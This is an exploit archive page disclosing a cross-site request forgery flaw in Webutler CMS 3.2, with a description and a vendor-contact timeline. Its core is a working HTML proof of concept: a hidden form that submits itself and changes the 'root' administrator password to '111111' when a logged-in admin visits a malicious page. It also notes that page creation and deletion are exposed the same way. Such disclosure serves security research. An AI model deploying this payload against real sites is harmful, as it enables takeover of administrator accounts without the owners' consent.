exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Webutler CMS 3.2 Cross Site Request Forgery

Webutler CMS 3.2 Cross Site Request Forgery
Posted Apr 21, 2016
Authored by Keerati T.

Webutler CMS version 3.2 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | c60c42cc4336feb6ee9c83dcae2abc556f909850f348817fea74aa3881349b35
Download | Favorite | View

Webutler CMS 3.2 Cross Site Request Forgery

Change Mirror Download
*# Exploit Title: Webutler CMS Cross-Site Request Forgery*
*# Date: 18 April 2016*
*# Exploit Author: Keerati T. (Post)*
*# Vendor Homepage: http://webutler.de/en <http://webutler.de/en>*
*# Software Link: http://webutler.de/download/webutler_v3.2.zip
<http://webutler.de/download/webutler_v3.2.zip>*
*# Version: 3.2*
*# Tested on: Linux*
 
*1.Description*
The Webutler is a simple online page editor for static HTML files.
Webmasters can provide a simple login option for image and text editing to
their customers. The Webutler is a tool for websites or projects to be
implemented with a small effort. The project has grown over the years and
now you can do a lot of things with it.
The all of administrative function allow any users to perform HTTP request
without verify the request. This exploit can be performed while the logged
on user (administrator) visit malicious web page that embedded HTML form.
 
 
*2. Proof of Concept*
Only change password function PoC, But other function (add page, delete
page, etc..) can be exploited.
 
<html>
  <body>
    <form action="http://10.0.0.102/webutler/admin/system/save.php"
method="POST">
      <input type="hidden" name="saveuser" value="1" />
      <!-- administrator user name is "root" -->
      <input type="hidden" name="username" value="root" />
      <input type="hidden" name="userpass1" value="111111" />
      <input type="hidden" name="userpass2" value="111111" />
      <input type="hidden" name="userlang" value="en" />
    </form>
  </body>
  <script>document.forms[0].submit();</script>
</html>
 
 
*3. Timeline*
11 Apr 2016 - Vulnerability discover.
11 Apr 2016 - No main contact available on vendor web page. Ask related
contact that shown on vendor web page instead.
18 Apr 2016 - No response from related contact and vulnerability disclosed.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close